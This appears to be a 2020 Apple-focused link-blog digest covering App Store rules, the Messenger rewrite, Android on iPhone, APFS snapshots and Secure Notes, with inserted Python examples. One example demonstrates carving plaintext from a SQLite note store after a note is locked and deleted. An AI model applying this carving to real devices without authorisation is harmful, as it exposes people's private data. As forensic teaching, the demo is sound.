As you can see, the DSKY has a black keypad with white legends, yellow indicator lights, and a green electroluminescent seven-segment display. Commands were entered numerically, as two-digit numbers — called Verb and Noun. The first one represented the action being issued, while the second represented the data that would be changed.

He’s designed some keyboard kits to commemorate the 50th anniversary of Apollo 11.

One of my goals was to use the legends and values from DSKY’s various keys and indicators, in place of traditional modifier legends. This in turn led me to a decision to use stock GMK colours, to make everything easier and more affordable.

Ken Shirriff (via Maxime Chevalier-Boisvert):

The Launch Vehicle Digital Computer (LVDC) had a key role in the Apollo Moon mission, guiding and controlling the Saturn V rocket. Like most computers of the era, it used core memory, storing data in tiny magnetic cores. In this article, I take a close look at an LVDC core memory module from Steve Jurvetson’s collection. This memory module was technologically advanced for the mid-1960s, using surface-mount components, hybrid modules, and flexible connectors that made it an order of magnitude smaller and lighter than mainframe core memories. Even so, this memory stored just 4096 words of 26 bits.

Previously:

Twitter Testing “Fleets”

Ryan Christoffel:

Today Twitter announced a test, limited to Brazil, of a major new feature for the social service: Fleets, which take their inspiration from the Stories feature found on Instagram, Snapchat, and Facebook.

Fleets, short for “fleeting tweets,” live at the top of your timeline just like stories do in other social media apps, and they disappear after 24 hours. Multiple fleets can be written in a day and include text, images, GIFs, and videos, but the way they are interacted with is different than a standard tweet. There’s no way to retweet or reply to someone’s tweet in a public sense; instead, followers can react to a fleet via DM, or a reaction which is sent via DM. Presumably this means that if someone’s DMs are closed, only people they follow can respond to their fleets.

Thursday, March 5, 2020

iCloud and iMessage Experiencing Performance Issues

Benjamin Mayo:

Apple is reporting that some cloud services including iMessage, iCloud Photos and iCloud Drive are currently experiencing technical difficulties.

Even when the status page is green, I receive iMessages out of order and with incorrect timestamps.

New App Store Guidelines for Push Notifications and More

Juli Clover:

Apple today informed developers that it has released updated App Store Review Guidelines, with changes that cover reviews, spam, push notifications, Sign in with Apple, data collection and storage, mobile device management, and more.

Here’s a diff.

Apple:

4.5.4 Push Notifications must not be required for the app to function, and should not be used to send sensitive personal or confidential information. Push Notifications should not be used for promotions or direct marketing purposes unless customers have explicitly opted in to receive them via consent language displayed in your app’s UI, and you provide a method in your app for a user to opt out from receiving such messages. Abuse of these services may result in revocation of your privileges.

Previously, apps were not allowed to send these types of push notifications at all, although Apple’s own apps sent marketing notifications, and it rarely enforced this for third-party apps. Some people are interpreting this relaxing of the rules as a sign that Apple is getting more serious about enforcement.

Curtis Herbert:

A) yay no more “no marketing pushes!? but apple does it!” hot takes

Will Apple’s apps let you opt out, as third-party apps are required to?

Guilherme Rambo:

Having each developer implement their own notification categorization system is a huge waste of resources.

Paul Haddad:

Now that Apple has a policy for marketing push messages they should also add a global toggle for them.

Nick Heer:

The rules are ambiguous about whether users must be able to opt out of push notification ads without entirely disabling notifications for an app.

[…]

Notably, there is also no requirement that push notification ads be a promotion for the app or its features. It seems perfectly legal under these rules for unscrupulous developers to sell push notification ad slots to third parties. Gross.

Kyle Howells:

Apple changing the rules to officially accept defeat on a rule they’ve never actually enforced.

Scott:

Apple is officially an advertising company. They allow marketing spam so they can receive a cut of sales.

Apple:

5.1.1 (ix) Apps that provide services in highly-regulated fields (such as banking and financial services, healthcare, and air travel) or that require sensitive user information should be submitted by a legal entity that provides the services, and not by an individual developer.

So no financial apps that can download your lists of transactions?

Apple (emphasis added):

3.1.3 (b) Multiplatform Services: Apps that operate across multiple platforms may allow users to access content, subscriptions, or features they have acquired in your app on other platforms or your web site, including consumable items in multiplatform games, provided those items are also available as in-app purchases within the app. You must not directly or indirectly target iOS users to use a purchasing method other than in-app purchase, and your general communications about other purchasing methods must not discourage use of in-app purchase.

Is the Mac another platform? Does this mean you can activate an iOS app with the serial number for a Mac app?

Max Seelemann:

That last bit is very interesting, as it makes it extra clear now that selling subscriptions outside the App Store for App Store apps is A-okay.

Apple:

1.4.4 Apps used to commit or attempt to commit crimes of any kind by helping users evade law enforcement will be rejected. Apps may only display DUI checkpoints that are published by law enforcement agencies, and should never encourage drunk driving or other reckless behavior such as excessive speed.

Damien Petrilli:

Everybody asks Apple to stand for freedom, and instead, Apple doubles down on rules to help dictatorships. This is clearly targeting the Hong Kong protesters’ app.

Oddly, the current version on Apple’s site seems to have reverted to the old wording:

1.4.4 Apps may only display DUI checkpoints that are published by law enforcement agencies, and should never encourage drunk driving or other reckless behavior such as excessive speed.

I like this version better, as virtually any app could be used to help commit a crime, e.g. even a basic to-do or messaging app. HKmap Live also had non-criminal uses. Apps shouldn’t be penalized for the ways customers choose to use them.

And there’s a whole new section:

5.6.1 App Store Reviews

App Store customer reviews can be an integral part of the app experience, so you should treat customers with respect when responding to their comments. Keep your responses targeted to the user’s comments and do not include personal information, spam, or marketing in your response.

Use the provided API to prompt users to review your app; this functionality allows customers to provide an App Store rating and review without the inconvenience of leaving your app, and we will disallow custom review prompts.

This seems reasonable.

Previously:

Update (2020-03-06): Juli Clover:

Apple is rejecting apps that are related to the COVID-19 coronavirus that aren’t provided by health organizations or government institutions, according to CNBC.

Four independent developers that spoke to CNBC said that their coronavirus apps, which were designed to let people see stats about which countries have confirmed cases, had been rejected.

One developer was told over the phone by an Apple employee that anything related to the coronavirus needs to be released by an official health organization or government, while another received a notice that “apps with information about current medical information need to be submitted by a recognized institution.”

I don’t think Apple should be in the business of deciding which apps have good health information. Some of the ones that were rejected undoubtedly did. Meanwhile, various world health and governmental organizations, as well as general news sources and forums, have in some cases spread misinformation, yet those apps remain welcome in the store.

Benjamin Mayo:

Apple seems to be doing a decent job rejecting health advice apps not published by official institutions, but there is deffo keyword spam going on. Plenty of random games show up when you search for “coronavirus”.

See also: Hacker News.

Update (2020-03-27): See also: App Store Review Guidelines History.

Rewriting Facebook Messenger

Facebook:

To make the Messenger iOS app faster, smaller, and simpler, we rebuilt the architecture and rewrote the entire codebase, which is an incredibly rare undertaking and involved engineers from across the company.

Compared with the previous iOS version, this new Messenger is twice as fast to start and is one-fourth the size. We reduced core Messenger code by 84 percent, from more than 1.7M lines to 360,000.

We accomplished this by using the native OS wherever possible, reusing the UI with dynamic templates powered by SQLite, using SQLite as a universal system, and building a server broker to operate as a universal gateway between Messenger and its server features.

[…]

Historically, coordinating data sharing across features required the development of custom, complex in-memory data caching and transaction subsystems. Transferring this logic between the database and the UI slowed down the app. We decided to forgo that in favor of simply using SQLite and letting it handle concurrency, caching, and transactions. Now, rather than supporting one system to update which friends are active now, another to update changes in profile pictures in your contact list, and another to retrieve the messages you receive, requests for data from the database are self-contained. All the caching, filtering, transactions, and queries are all done in SQLite. The UI merely reflects the tables in the database.

This keeps the logic simple and functional, and it limits the impact on the rest of the app. But we went even further. We developed a single integrated schema for all features. We extended SQLite with the capability of stored procedures, allowing Messenger feature developers to write portable, database-oriented business logic, and finally, we built a platform (MSYS) to orchestrate all access to the database, including queued changes, deferred or retriable tasks, and for data sync support.

Dan Abramov:

Many readers focused on the app being native. That shouldn’t be a surprise. The app was fully native before the rewrite, too! So it’s a native app — and rewritten to a native app. Turns out, squeezing out the last bits of performance is about more than “being 100% native”!

Was this a rewrite from RN? No, Messenger didn’t use React Native at the time it was rewritten.

Again, this is a native app rewritten to a native app. The big change is dropping all of the xplat shared FB infrastructure code (not RN) in favour of a lean core in plain C.

[…]

But the whole point is that “native” doesn’t guarantee “fast”. The old app was native, AND it was slow. The difference is in how they solved their requirements in a creative way. For example, they don’t write “native views” like everyone else to save size — UI is driven by DB!

Facebook’s investment in React Native is as high as ever. The main app has 750+ React Native screens, and it’s used for several standalone apps. It’s not the right tradeoff for Messenger, but this ethos (e.g. lean use of C) inspires a lot of the ongoing React Native work.

Previously:

Project Sandcastle: Android for the iPhone

Corellium (tweet):

The iPhone restricts users to operate inside a sandbox. But when you buy an iPhone, you own the iPhone hardware. Android for the iPhone gives you the freedom to run a different operating system on that hardware.

Android for the iPhone has many exciting practical applications, from forensics research to dual-booting ephemeral devices to combatting e-waste.

The source is here.

Corellium:

By leveraging our virtual devices, along with our deep knowledge of both the Android OS and the iPhone hardware, we were able to rapidly iterate to bring Android to life.

[…]

Unfortunately, Android developers enshrined the 4kB page size in the build system, breaking AArch64 convention; third-party applications containing binary libraries built for these small pages will not be able to start on our Android port and will need to be rebuilt. It’s not intrinsically hard - one or two command-line options - but it can’t be done if all you have is an APK.

Less limiting is the lack of 32-bit code support on our platform. While Android these days requires support for pure 64-bit systems from application developers, the system itself still has moldy chunks of 32-bit only code in unexpected places.
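Whether a given native library will hit the page-size problem Corellium describes can be read straight from its ELF program headers: each `PT_LOAD` segment carries a `p_align`, and a kernel can only map a segment whose alignment is a multiple of its page size. The checker below is an added example of mine, not Corellium’s or Android’s code. It assumes a 16 kB page size for Apple’s arm64 hardware (the post itself only says Android’s 4 kB assumption breaks AArch64 convention), builds a constructed, non-runnable ELF to exercise itself, and the remedy it names for a failing library, rebuilding with `-Wl,-z,max-page-size=16384`, is the usual linker option rather than anything the post specifies.

```python
import struct
import sys

ELF_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
PROG_HEADER = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr
PT_LOAD = 1
PT_DYNAMIC = 2
ET_DYN = 3
EM_AARCH64 = 183
APPLE_ARM64_PAGE = 16384   # assumption from outside the post: 16 kB pages


def load_segment_alignments(data):
    """p_align of every PT_LOAD segment in a 64-bit little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF file")
    fields = ELF_HEADER.unpack_from(data, 0)
    e_phoff, e_phentsize, e_phnum = fields[5], fields[9], fields[10]
    aligns = []
    for i in range(e_phnum):
        p_type, _, _, _, _, _, _, p_align = PROG_HEADER.unpack_from(
            data, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD:
            aligns.append(p_align)
    return aligns


def loadable_with_page_size(data, page_size):
    """True if every PT_LOAD alignment is a multiple of page_size, i.e. the
    loader can mmap each segment at its file offset on such a kernel.
    A p_align of 0 or 1 means 'no constraint' and is accepted."""
    return all(a % page_size == 0
               for a in load_segment_alignments(data) if a > 1)


def build_fake_elf(align, n_load=2):
    """Constructed, non-runnable AArch64 shared object with n_load PT_LOAD
    segments at the given alignment; for exercising the checker only."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    n_ph = n_load + 1
    ehdr = ELF_HEADER.pack(e_ident, ET_DYN, EM_AARCH64, 1, 0, ELF_HEADER.size,
                           0, 0, ELF_HEADER.size, PROG_HEADER.size, n_ph,
                           0, 0, 0)
    phdrs = b""
    for i in range(n_load):
        phdrs += PROG_HEADER.pack(PT_LOAD, 5, i * align, i * align, i * align,
                                  0x100, 0x100, align)
    phdrs += PROG_HEADER.pack(PT_DYNAMIC, 6, 0, 0, 0, 0, 0, 8)  # not a load
    return ehdr + phdrs


if __name__ == "__main__":
    # Usage: python3 check_pages.py lib/arm64-v8a/*.so  (an APK is a zip file)
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            blob = f.read()
        aligns = load_segment_alignments(blob)
        ok = loadable_with_page_size(blob, APPLE_ARM64_PAGE)
        print("%s: PT_LOAD aligns %s -> %s" % (
            path, [hex(a) for a in aligns],
            "ok" if ok else "needs rebuild with -Wl,-z,max-page-size=16384"))
```

A library linked for 4 kB pages reports `0x1000` and fails the 16 kB check; one linked with 16 kB or 64 kB alignment passes, and since 64 kB is a multiple of both, that is the alignment to pick if you want one binary for every kernel. This is also why, as the post says, the fix cannot be applied to an APK you did not build: the alignment is decided at link time.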

Update (2020-03-06): Isaiah Carew:

this is kind of mind blowing -- running Android on iOS.

i’d prefer the opposite. i’d like to be able to run iOS on generic hardware.

Hiding Easter Eggs in Maps

Zoey Poll (via Paul Kafasis, Hacker News):

Watching a single place evolve over time reveals small histories and granular inconsistencies. Train stations and airports are built, a gunpowder factory disappears for the length of the Cold War. But on certain maps, in Switzerland’s more remote regions, there is also, curiously, a spider, a man’s face, a naked woman, a hiker, a fish, and a marmot. These barely-perceptible apparitions aren’t mistakes, but rather illustrations hidden by the official cartographers at Swisstopo in defiance of their mandate “to reconstitute reality.” Maps published by Swisstopo undergo a rigorous proofreading process, so to find an illicit drawing means that the cartographer has outsmarted his colleagues.

[…]

Errors—both accidental and deliberate—are not uncommon in maps (17th-century California as an island, the omission of Seattle in a 1960s AAA map). Military censors have long transformed nuclear bunkers into nondescript warehouses and routinely pixelate satellite images of sensitive sites. Many maps also contain intentional errors to trap would-be copyright violators. The work of recording reality is particularly vulnerable to plagiarism: if a cartographer is suspected of copying another’s work, he can simply claim to be duplicating the real world— ideally, the two should be the same. Mapmakers often rely on fictitious streets, typically no longer than a block, to differentiate their accounts of the truth (Oxygen Street in Edinburgh, for example).

Previously:

Mac Programming in 2020

In the post-show for ATP 366, John Siracusa discusses adding a bit of interface polish to his SwitchGlass app. What seems like a simple enhancement takes him down a trail of API bugs and limitations, documentation problems, edge cases, heuristics, race conditions, security prompts, and sandboxing.

Previously:

Wednesday, March 4, 2020

Optimizing PDF File Size

Patrik Weiskircher:

However, [incremental saving] also causes the file size to grow and grow and never get smaller. This is especially noticeable if you work with a lot of images. And even if you remove an image, it still is included in the PDF; you only instruct your PDF viewer to not show it again.

[…]

Another nice feature of PDFs is that objects like fonts and images can be shared across pages — a feature that was specifically made in an effort to save on the size of files. This means you can have an image logo on each page and it is only included in the PDF file once.

[…]

So right before we start saving the document, we go through the entire PDF file and collect a list of all the reachable object numbers. Then, when saving the PDF, but before we write out an indirect object, we compare its object number with the list we collected, and if the object isn’t included, we simply don’t write it out.

I can’t tell from this whether they coalesce duplicate objects or only garbage collect unreferenced ones.
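The reachability pass described in the quote, and the coalescing step the question above asks about, as an added example that is not code from the quoted post or from any PDF library. It runs a mark phase over a constructed object table keyed by object number, optionally merges byte-identical stream objects (rewriting references to the survivor), and writes a classic, non-incremental file whose xref table carries free entries for the dropped numbers. The object bodies, `REF` regex and helper names are all constructed for this demo.

```python
"""Added example: garbage-collect unreachable PDF objects at save time, and
optionally coalesce byte-identical streams. Constructed for this page; not
the quoted post's code."""
import re

# Indirect reference "n 0 R"; generation numbers other than 0 are ignored here.
REF = re.compile(rb"(\d+)\s+0\s+R\b")

# Constructed object table: number -> body without the "n 0 obj"/"endobj" wrapper.
# 5 and 6 are byte-identical logo images used by two pages; 7 is an image that
# was removed from a page but still sits in the file after an incremental save.
IMAGE = b"<< /Type /XObject /Subtype /Image /Width 1 /Height 1 /Length 3 >>\nstream\n%s\nendstream"
SAMPLE = {
    1: b"<< /Type /Catalog /Pages 2 0 R >>",
    2: b"<< /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >>",
    3: b"<< /Type /Page /Parent 2 0 R /Resources << /XObject << /Logo 5 0 R >> >> >>",
    4: b"<< /Type /Page /Parent 2 0 R /Resources << /XObject << /Logo 6 0 R >> >> >>",
    5: IMAGE % b"\xff\x00\x00",
    6: IMAGE % b"\xff\x00\x00",
    7: IMAGE % b"\x00\x00\xff",
}
ROOT = 1  # object number the trailer's /Root points at


def references(body):
    """Object numbers this body points at."""
    return [int(n) for n in REF.findall(body)]


def reachable(objects, root):
    """Mark phase: every object number reachable from the trailer root."""
    seen, stack = set(), [root]
    while stack:
        n = stack.pop()
        if n in seen or n not in objects:  # dangling references are simply skipped
            continue
        seen.add(n)
        stack.extend(references(objects[n]))
    return seen


def coalesce(objects):
    """Map each stream object to the lowest-numbered object with identical bytes
    and rewrite references to point at the survivor. Only stream objects (images,
    fonts, content) are candidates; dictionaries such as pages carry identity in
    the tree and are never merged."""
    survivor_for_body, remap = {}, {}
    for n in sorted(objects):
        body = objects[n]
        remap[n] = survivor_for_body.setdefault(body, n) if b"stream" in body else n

    def rewrite(body):
        return REF.sub(lambda m: b"%d 0 R" % remap.get(int(m.group(1)), int(m.group(1))), body)

    merged = {n: rewrite(body) for n, body in objects.items() if remap[n] == n}
    return merged, remap


def plan_save(objects, root, dedupe=False):
    """Decide what reaches the file: coalesce if asked, then keep only what the root reaches."""
    if dedupe:
        objects, remap = coalesce(objects)
        root = remap.get(root, root)
    keep = reachable(objects, root)
    return {n: objects[n] for n in keep}, root


def serialize(objects, root):
    """Write a classic (non-incremental) file with a contiguous xref table.
    Object numbers that were dropped get 'f' (free) entries so the table stays well formed."""
    out = bytearray(b"%PDF-1.4\n")
    offsets = {}
    for n in sorted(objects):
        offsets[n] = len(out)
        out += b"%d 0 obj\n%s\nendobj\n" % (n, objects[n])
    xref_at = len(out)
    size = max(objects) + 1
    out += b"xref\n0 %d\n0000000000 65535 f \n" % size
    for n in range(1, size):
        out += (b"%010d 00000 n \n" % offsets[n]) if n in offsets else b"0000000000 00000 f \n"
    out += b"trailer\n<< /Size %d /Root %d 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (size, root, xref_at)
    return bytes(out)


if __name__ == "__main__":
    for dedupe in (False, True):
        kept, root = plan_save(SAMPLE, ROOT, dedupe=dedupe)
        print("dedupe=%s kept=%s bytes=%d" % (dedupe, sorted(kept), len(serialize(kept, root))))
```

Garbage collection alone drops object 7 (the removed image); coalescing additionally folds 6 into 5 and rewrites page 4 to reference 5. Coalescing is deliberately limited to byte-identical streams: two page dictionaries can become byte-identical after reference rewriting, and merging those would change the document.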

Wide Gamut Color in CSS With Display-P3

Nikita Vasilyev (Hacker News):

WebKit is the only browser engine that supports Display-P3 color as of January 2020.

[…]

One way to provide a fallback is to include the same property with the sRGB color before:

header {
    color: rgb(0, 255, 0);
    color: color(display-p3 0 1 0);
}

Browsers other than WebKit currently parse color(…) as an invalid value. CSS properties with invalid values are ignored by browsers.

Alternatively, you can use an @supports feature query.

Apple’s (Not Quite) Secure Notes

Sarah Edwards:

However, the ZSNIPPET column shows the partial unencrypted content of this note. This is where potentially sensitive information from the note could be extracted. While I cannot see the full contents of the secure note, I can see the snippet or the first line of the note! I am unable to see “The ocean is wet.” in this field.

[…]

I mentioned the ZMARKEDFORDELETION column previously. When do these entries get deleted? Turns out, a few different ways!

  • Upon exiting Notes on macOS
  • Upon closing the Notes window on macOS
  • Upon swiping up (to go to the home screen) on iOS. Switching to another app does not necessarily delete the entries.

[…]

Due to the nature of how Apple Secure Notes work, it is possible for forensic analysts to acquire information, even if it is currently encrypted.

Besides this, it’s not clear to me that the old unencrypted data will actually be wiped from the SQLite database page when the row is logically deleted. And even then it may persist on disk, in previous blocks for both the database and for Spotlight. All of these problems stem from converting an unencrypted note to be encrypted. It’s better to start out with an empty encrypted note and then add content to it.

In EagleFiler I try to avoid this by encrypting the entire library from the start. The files and database, as well as search indexes, temporary files, Spotlight, and the versions database are only ever written in encrypted form.
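The two residue paths discussed above, the plaintext preview column and the logically deleted row, as an added example that is neither Sarah Edwards’s nor Apple’s code. It builds a constructed SQLite note store (a stand-in for the ZSNIPPET and ZMARKEDFORDELETION columns, not Apple’s schema), locks a note by rewriting its body as ciphertext, purges the row, and then carves the raw file the way a forensic tool would, with and without `PRAGMA secure_delete` and `VACUUM`. Table name, column names and note text are all constructed.

```python
"""Added example: where note plaintext lingers in a SQLite store after a note
is locked and its row is purged. Constructed schema and data; not Apple's."""
import os
import sqlite3
import tempfile

# Constructed note content. The body fits in one 4 KiB page, so no overflow pages.
BODY = b"The ocean is wet. It is also salty and deep. " * 12
SNIPPET = BODY[:40].decode()                   # preview kept in the clear, like ZSNIPPET
OTHER_NOTE = b"grocery list: milk, eggs, bread " * 16  # an unrelated second note


def file_contains(path, needle):
    """Carve the raw database file for a byte string, as a forensic tool would."""
    with open(path, "rb") as fh:
        return needle in fh.read()


def lock_then_purge(secure_delete=False, vacuum=False):
    """Lock a plaintext note, then purge its row; report which plaintext survives on disk."""
    fd, path = tempfile.mkstemp(suffix=".sqlite")
    os.close(fd)
    conn = sqlite3.connect(path, isolation_level=None)  # autocommit: each statement reaches the file
    conn.execute("PRAGMA journal_mode=DELETE")          # in WAL mode the -wal file is one more place to look
    # Some platform builds default secure_delete to ON, so set it explicitly either way.
    conn.execute("PRAGMA secure_delete=" + ("ON" if secure_delete else "OFF"))
    conn.execute("CREATE TABLE note (pk INTEGER PRIMARY KEY, body BLOB, snippet TEXT, marked INTEGER)")

    # 1. Both notes start out unencrypted.
    conn.execute("INSERT INTO note VALUES (1, ?, ?, 0)", (BODY, SNIPPET))
    conn.execute("INSERT INTO note VALUES (2, ?, ?, 0)", (OTHER_NOTE, OTHER_NOTE[:40].decode()))

    # 2. Locking note 1 rewrites its body as ciphertext (random bytes stand in for it;
    #    a real scheme adds a nonce and tag, so the row grows and SQLite must move it
    #    to a new slot in the page) while the preview column is left as it was.
    ciphertext = os.urandom(len(BODY) + 28)
    conn.execute("UPDATE note SET body = ? WHERE pk = 1", (ciphertext,))
    result = {
        "snippet_after_lock": file_contains(path, SNIPPET.encode()),
        "body_after_lock": file_contains(path, BODY),  # old slot still holds the plaintext unless zeroed
    }

    # 3. Purge: flag the row, then delete it (the ZMARKEDFORDELETION flow).
    conn.execute("UPDATE note SET marked = 1 WHERE pk = 1")
    conn.execute("DELETE FROM note WHERE marked = 1")
    if vacuum:
        conn.execute("VACUUM")  # rebuilds the file from live rows, leaving freed cells behind
    conn.close()

    result["snippet_after_purge"] = file_contains(path, SNIPPET.encode())
    result["body_after_purge"] = file_contains(path, BODY)
    os.unlink(path)
    return result


if __name__ == "__main__":
    print("default      ", lock_then_purge())
    print("secure_delete", lock_then_purge(secure_delete=True))
    print("vacuum       ", lock_then_purge(vacuum=True))
```

With both settings off, the preview text and the original body are still carveable after the row is gone: SQLite only links the freed cell into the page’s freeblock list. `secure_delete` zeroes freed cells as they are released, and `VACUUM` rebuilds the file from live rows, so either removes the residue from the main file; neither helps with copies already in a journal, a WAL file, a Spotlight index, or an earlier snapshot, which is why starting from an empty encrypted note is the safer order.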

Previously:

Tuesday, March 3, 2020

APFS Snapshots and Large Files

Howard Oakley:

Snapshots are more efficient than regular backups. If a single byte changes in a file, the whole of that file has to be copied in the next backup. Snapshots keep only the parts of the file that change, so that the original can be reconstructed. But over time and use of that file, the amount of it which has to be retained to restore its original state inevitably rises up to the limit of the whole file size.

[…]

If you have sufficient free disk space to include VM and other large files in backups and snapshots, then you don’t need to change their location or policies.

To maintain better control of backup storage, you should move VMs and other large files to a separate volume, and add the whole volume to the Time Machine exclude list, or disable snapshots on that volume in Carbon Copy Cloner.
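The retention behaviour described above, as an added example that is not from Howard Oakley’s post and does not model APFS’s real on-disk format: a block-level copy-on-write volume in which a snapshot freezes the file’s block map, and a rewritten block stays allocated only while some snapshot still maps to it. It shows why a VM image that touches a little of itself all day pins more and more space, how one snapshot’s cost is bounded by the file size while several snapshots together are not, and the names `SnapshotVolume`, `BLOCK` and `vm_image_growth` are constructed.

```python
"""Added example: block-level accounting for copy-on-write snapshots.
Constructed model; not APFS's actual implementation."""
import random

BLOCK = 4096  # bytes per block (constructed)


class SnapshotVolume:
    """A single file's block map, plus frozen copies of it taken by snapshots."""

    def __init__(self, blocks):
        # block index -> version id of the data currently at that block; 0 is the original content
        self.live = {i: 0 for i in range(blocks)}
        self.next_version = 1
        self.snapshots = []

    def file_bytes(self):
        return len(self.live) * BLOCK

    def snapshot(self):
        """Freeze the current block map. Costs nothing until blocks are rewritten."""
        self.snapshots.append(dict(self.live))

    def write(self, block):
        """Copy-on-write: the block gets a fresh version; the old one stays allocated
        only if a snapshot still references it."""
        self.live[block] = self.next_version
        self.next_version += 1

    def retained_bytes(self, index=None):
        """Space held only for snapshots: (block, version) pairs no longer in the live file.
        With index=None all snapshots are counted together, each old version once."""
        snaps = self.snapshots if index is None else [self.snapshots[index]]
        live_set = set(self.live.items())
        pinned = set()
        for snap in snaps:
            pinned |= set(snap.items()) - live_set
        return len(pinned) * BLOCK

    def delete_snapshot(self, index):
        """Dropping a snapshot releases whatever only it was pinning."""
        del self.snapshots[index]


def vm_image_growth(blocks=1024, snapshots=8, writes_per_snapshot=256, seed=1):
    """Periodic snapshots of a VM image that rewrites random blocks between them.
    Returns the total retained bytes after each round; it never decreases."""
    rng = random.Random(seed)
    vol = SnapshotVolume(blocks)
    history = []
    for _ in range(snapshots):
        vol.snapshot()
        for _ in range(writes_per_snapshot):
            vol.write(rng.randrange(blocks))
        history.append(vol.retained_bytes())
    return history


if __name__ == "__main__":
    vol = SnapshotVolume(4)
    vol.snapshot()
    for _ in range(5):
        vol.write(0)          # rewriting one block repeatedly pins only one block
    print(vol.retained_bytes() // BLOCK, "block(s) pinned")
    print([b // BLOCK for b in vm_image_growth(blocks=64, snapshots=4, writes_per_snapshot=32)])
```

Rewriting the same block a hundred times costs one block per snapshot, but once every block has been touched at least once since the snapshot, that snapshot pins the whole file; a second snapshot taken in between starts pinning its own copies, so the total grows past the file size. That is the arithmetic behind moving VM images to a volume whose snapshots you can turn off.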

See also:

Previously:

2020 Mac Hardware Rumors

Chance Miller:

But the 14-inch MacBook Pro is said to be just one of the mini-LED products Apple will release in 2020. The others include a 12.9-inch iPad Pro, a 27-inch iMac Pro, a 16-inch MacBook Pro, a 10.2-inch iPad, and a 7.9-inch iPad mini.

Kuo doesn’t offer specific release dates for any of the products other than the iMac Pro, which he says is coming in Q4.

So the 13-inch MacBook Pro will finally get the fixed keyboard, but no word on the MacBook Air.

A Q4 iMac Pro release would mean about 3.5 years between the announcement and the first update.

This is not the pace we’d hoped for.

Update (2020-03-12): Mike Rockwell:

Just a month or two after I started using my [2018] Air, I started having issues with missed and duplicate key presses. I’ve sort-of lived with the annoyance until now because I didn’t have another suitable Mac available to use while my primary machine is out for repair.

Joe Rossignol:

Apple plans to release new MacBook Pro and MacBook Air models with scissor keyboards in the second quarter of 2020, according to a new research note today from analyst Ming-Chi Kuo, obtained by MacRumors.

Joe Rossignol:

Kuo said Apple plans to launch MacBook models with its own custom processors in the fourth quarter of 2020 or the first quarter of 2021.

MacSurfer Shutting Down

MacSurfer:

Not seeing a viable future with subscriptions, MacSurfer and TechNN will cease operations effective immediately. Please allow a few weeks to process forthcoming refunds. If need be, subscription inquiries can be addressed to the Publisher at the bottom of the Homepage.

Thanks kindly for your support, and thanks for the memories...

I’m sad to see this, as it was a great site for many years, and perhaps the best way pre-Twitter to find lots of stories from a wide variety of sites.

Dan Moren:

For many years, they were an invaluable resource, a manageable way to quickly see what was going on in the Apple world without having to subscribe to hundreds of sites and spend literally all of your time trawling headlines.

But as social media and podcasting grew in popularity and RSS and “visiting actual websites” ebbed, MacSurfer struggled to adjust.

Previously:

Update (2020-03-12): Steven Sande:

It’s sad to see websites shut down for any reason, and it seems like some of the older, more established sites just aren’t making it anymore. […] Well, that list gave me a good look at the sites that are no longer with us…

[…]

That’s not including The Unofficial Apple Weblog (killed by AOL in February, 2015), MacCentral, Macsimum News, and Apple Daily Report — websites that Dennis and I were involved with over the years.

SETI@home Shuts Down

Lawrence Abrams:

SETI@home has announced that they will no longer be distributing new work to clients starting on March 31st as they have enough data and want to focus on completing their back-end analysis of the data.

SETI@home is a distributed computing project where volunteers contribute their CPU resources to analyze radio data from the Arecibo radio telescope in Puerto Rico and the Green Bank Telescope in West Virginia for signs of extraterrestrial intelligence (SETI).

Monday, March 2, 2020

Xconfig and XcodeBuildSettings.com

Paulo Andrade (tweet):

If you’re like me, when working with .xcconfig files or building your shell script to include in a “Run Script” phase, you’ll keep running to the Terminal to run this:

xcodebuild -project <Project>.xcodeproj -target <Target> -showBuildSettings

[…]

So I’ve built Xconfig, a simple Mac app to display build settings for the currently open Xcode projects.

Mattt Thompson:

Introducing XcodeBuildSettings.com: a convenient reference of available build settings for Xcode projects.

Previously:

“Time” Swift Package

Dave DeLong (tweet):

Time is a Swift package to make date and time calculations much easier. As Apple platform developers we’ve been blessed to have the raw power of the Foundation APIs available to us. These are, arguably, some of the most powerful calendaring APIs out there.

However, they have a myriad of sharp edges that frequently trip up developers. Time is my attempt to solve those problems. I won’t go into detail here about what those problems are; for that I’ll encourage you to check out the Time repository on github.

PlayStation Copy Protection

Technology Connections:

The original PlayStation is a pretty neat thing. Using the CD as a storage medium was a smart move. But, Sony needed to add anti-piracy features to the disc to prevent miscreants from making bootleg copies of Crash Bandicoot. This video tells the story of how that works, why it wasn’t infallible, and also proposes a potentially impervious solution (24 years late, though).

Via SwiftOnSecurity:

PlayStation DRM wasn’t based on hiding data on the CD. You can read them with a PC. They wrote DRM data via the spiral, which is slightly perturbed in a pattern. At home you can write the data on a CD, but not the vibration of the spiral.

Update (2020-03-12): Ashley Bischoff:

If you haven’t seen it already, I can strongly vouch for this video on “How the Sony PlayStation PS1 Security Was Defeated” from @ModernVintageG.

Apple Disables Clearview AI’s Enterprise Certificate

BuzzFeed (Hacker News, MacRumors):

Apple has disabled the iOS application of Clearview AI — the facial recognition company that claims to have amassed a database of billions of photos and has worked with thousands of organizations around the world — after BuzzFeed News determined that the New York–based startup had been violating the iPhone maker’s rules around app distribution.

[…]

An Apple spokesperson told BuzzFeed News that the Apple Developer Enterprise Program should only be used to distribute apps within a company. Companies that violate that rule, the spokesperson said, are subject to revocation of their accounts. Clearview has 14 days to respond to Apple.

Zack Whittaker (via Matthew Panzarino):

The app allows its users — who the company claims are only law enforcement officers — to use their phone camera or upload a photo to search its database of 3 billion photos. But BuzzFeed News revealed that the company — which claims to only cater to law enforcement users — also includes many private-sector users, including Macy’s, Walmart and Wells Fargo.

Previously: